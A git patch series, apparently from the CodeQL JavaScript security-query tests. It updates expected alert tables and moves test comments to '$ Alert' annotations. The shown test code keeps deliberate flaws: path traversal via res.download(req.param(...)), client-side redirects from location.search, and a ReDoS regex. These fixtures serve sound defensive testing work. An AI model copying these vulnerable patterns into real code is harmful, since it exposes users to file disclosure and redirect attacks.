-| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index f776c9d40e68..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); From 87518ba60e237266d8b6aa2334a58d44778c6e48 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:09:21 +0100 Subject: [PATCH 133/892] JS: Update tainted-sendFile.js This file was added on main while this branch was in progress. Porting the whole file in one step. --- .../CWE-022/TaintedPath/TaintedPath.expected | 24 +++++++++---------- .../CWE-022/TaintedPath/tainted-sendFile.js | 13 ++++------ 2 files changed, 17 insertions(+), 20 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 14fcafa92069..338cd21265d3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -161,10 +161,10 @@ | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | @@ -571,8 +571,8 @@ edges | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -1080,12 +1080,12 @@ nodes | tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | | tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index 9a200f2a4c99..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -23,17 +23,14 @@ app.get('/some/path/:x', function(req, res) { res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); From b4ac2f7d73eb6bc330d13230b7fffd99b71812f9 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:07 +0100 Subject: [PATCH 134/892] JS: Add a query ID --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index b71ed168533f..4a92f5f29fb4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } From fd6a9c614408c897261b96be25896cef6f513b4a Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:20 +0100 Subject: [PATCH 135/892] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c5b183cb273d..d5a28e5858dc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -342,4 +342,4 @@ var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] -var unicodeSets = /(aa?)*b/v; +var unicodeSets = /(aa?)*b/v; // $ Alert[js/redos] From 19cada38ffc765705fcd9720afca34565b6c9735 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:40 +0100 Subject: [PATCH 136/892] JS: Migrate a new file from OK-style comments --- .../Security/CWE-601/ClientSideUrlRedirect/tst16.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js index 49c88a892c9e..edeaa40174d4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js @@ -2,7 +2,7 @@ import queryString from 'query-string'; import querystringify from 'querystringify'; function foo() { - location.href = queryString.parse(location.search).data; // NOT OK - location.href = queryString.extract(location.search); // NOT OK - location.href = querystringify.parse(location.search).data; // NOT OK + location.href = queryString.parse(location.search).data; // $ Alert + location.href = queryString.extract(location.search); // $ Alert + location.href = querystringify.parse(location.search).data; // $ Alert } From 64d39da5f81be4600aa207c997ed0643a711a631 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:57:10 +0100 Subject: [PATCH 137/892] JS: Accept Sources/Sink tags --- .../tst-UntrustedDataToExternalAPI.js | 2 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 2 +- .../CWE-022/TaintedPath/TaintedPath.js | 18 +- .../TaintedPath/examples/TaintedPath.js | 2 +- .../CWE-022/TaintedPath/normalizedPaths.js | 46 ++-- .../CWE-022/TaintedPath/other-fs-libraries.js | 10 +- .../Security/CWE-022/TaintedPath/prettier.js | 2 +- .../Security/CWE-022/TaintedPath/pupeteer.js | 2 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 6 +- .../TaintedPath/tainted-promise-steps.js | 2 +- .../TaintedPath/tainted-string-steps.js | 2 +- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 10 +- .../Security/CWE-022/ZipSlip/ZipSlipBad2.js | 2 +- .../CWE-022/ZipSlip/ZipSlipBadUnzipper.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 4 +- .../test/query-tests/Security/CWE-073/tst2.js | 10 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 18 +- .../CWE-078/CommandInjection/exec-sh.js | 4 +- .../CWE-078/CommandInjection/exec-sh2.js | 4 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 12 +- .../CWE-078/CommandInjection/other.js | 2 +- .../third-party-command-injection.js | 2 +- .../IndirectCommandInjection/actions.js | 2 +- ...ommand-line-parameter-command-injection.js | 32 +-- .../second-order.js | 4 +- .../lib/isImported.js | 4 +- .../UnsafeShellCommandConstruction/lib/lib.js | 246 +++++++++--------- .../lib/lib2.js | 8 +- .../lib/subLib/amdSub.js | 4 +- .../lib/subLib/index.js | 10 +- .../lib/subLib2/compiled-file.ts | 4 +- .../lib/subLib2/special-file.js | 4 +- .../lib/subLib3/my-file.ts | 4 +- .../lib/subLib4/index.js | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-079/DomBasedXss/addEventListener.js | 6 +- .../DomBasedXss/angular-tempate-url.js | 2 +- .../CWE-079/DomBasedXss/classnames.js | 2 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 8 +- .../Security/CWE-079/DomBasedXss/d3.js | 2 +- .../Security/CWE-079/DomBasedXss/dates.js | 8 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 6 +- .../Security/CWE-079/DomBasedXss/jquery.js | 4 +- .../CWE-079/DomBasedXss/json-stringify.jsx | 2 +- .../CWE-079/DomBasedXss/jwt-server.js | 2 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 4 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 2 +- .../CWE-079/DomBasedXss/react-use-state.js | 8 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 2 +- .../CWE-079/DomBasedXss/stored-xss.js | 4 +- .../tainted-url-suffix-arguments.js | 2 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 4 +- .../Security/CWE-079/DomBasedXss/translate.js | 2 +- .../CWE-079/DomBasedXss/trusted-types.js | 4 +- .../Security/CWE-079/DomBasedXss/tst.js | 62 ++--- .../Security/CWE-079/DomBasedXss/tst3.js | 2 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 2 +- .../Security/CWE-079/DomBasedXss/winjs.js | 2 +- .../CWE-079/ExceptionXss/exception-xss.js | 12 +- .../CWE-079/ReflectedXss/ReflectedXss.js | 8 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 2 +- .../Security/CWE-079/ReflectedXss/etherpad.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 2 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 8 +- .../Security/CWE-079/ReflectedXss/promises.js | 2 +- .../Security/CWE-079/ReflectedXss/tst2.js | 14 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 4 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 2 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 4 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 20 +- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 4 +- .../unsafe-jquery-plugin.js | 30 +-- .../Security/CWE-079/XssThroughDom/angular.ts | 2 +- .../Security/CWE-079/XssThroughDom/forms.js | 16 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 12 +- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 4 +- .../Security/CWE-089/untyped/graphql.js | 12 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 4 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 2 +- .../CWE-089/untyped/marsdb-flow-to.js | 2 +- .../Security/CWE-089/untyped/marsdb.js | 2 +- .../Security/CWE-089/untyped/minimongo.js | 2 +- .../Security/CWE-089/untyped/mongodb.js | 12 +- .../CWE-089/untyped/mongodb_bodySafe.js | 2 +- .../Security/CWE-089/untyped/mongoose.js | 4 +- .../CWE-089/untyped/mongooseJsonParse.js | 2 +- .../CWE-089/untyped/mongooseModelClient.js | 2 +- .../Security/CWE-089/untyped/mysql.js | 2 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 2 +- .../Security/CWE-089/untyped/redis.js | 4 +- .../Security/CWE-089/untyped/socketio.js | 2 +- .../Security/CWE-089/untyped/tst3.js | 2 +- .../CodeInjection/bad-code-sanitization.js | 4 +- .../Security/CWE-094/CodeInjection/express.js | 6 +- .../CWE-094/CodeInjection/lib/index.js | 8 +- .../CWE-094/CodeInjection/react-native.js | 2 +- .../CWE-094/CodeInjection/template-sinks.js | 2 +- .../Security/CWE-094/CodeInjection/tst.js | 2 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 2 +- .../CWE-116/IncompleteSanitization/tst.js | 2 +- .../Security/CWE-117/logInjectionBad.js | 12 +- .../Security/CWE-200/FileAccessToHttp.js | 2 +- .../Security/CWE-200/bufferRead.js | 2 +- .../Security/CWE-200/googlecompiler.js | 2 +- .../Security/CWE-200/readFileSync.js | 2 +- .../Security/CWE-200/readStreamRead.js | 2 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 2 +- .../Security/CWE-201/PostMessageStar2.js | 2 +- .../test/query-tests/Security/CWE-209/node.js | 2 +- .../test/query-tests/Security/CWE-209/tst.js | 2 +- .../Security/CWE-312/CleartextStorage.js | 2 +- .../Security/CWE-312/CleartextStorage2.js | 2 +- .../Security/CWE-312/build-leaks.js | 6 +- .../query-tests/Security/CWE-312/passwords.js | 22 +- .../Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-327/tst.js | 2 +- .../test/query-tests/Security/CWE-338/tst.js | 8 +- .../test/query-tests/Security/CWE-346/tst.js | 2 +- .../CWE-377/insecure-temporary-file.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 4 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 4 +- .../Security/CWE-400/ReDoS/lib/lib.js | 22 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 4 +- .../ReDoS/lib/otherLib/js/src/index.js | 4 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 12 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 4 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 4 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 4 +- .../CWE-400/ReDoS/polynomial-redos.js | 148 +++++------ .../CWE-400/RemovePropertyInjection/tst.js | 2 +- .../RemovePropertyInjection/tstNonExpr.js | 2 +- .../test/query-tests/Security/CWE-506/tst.js | 4 +- .../CWE-522-DecompressionBombs/adm-zip.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 2 +- .../CWE-522-DecompressionBombs/pako.js | 4 +- .../CWE-522-DecompressionBombs/unzipper.js | 2 +- .../CWE-522-DecompressionBombs/yauzl.js | 2 +- .../CWE-522-DecompressionBombs/zlib.js | 8 +- .../CWE-601/ClientSideUrlRedirect/electron.js | 2 +- .../ClientSideUrlRedirect/regexp-exec.js | 10 +- .../ClientSideUrlRedirect/sanitizer.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 14 +- 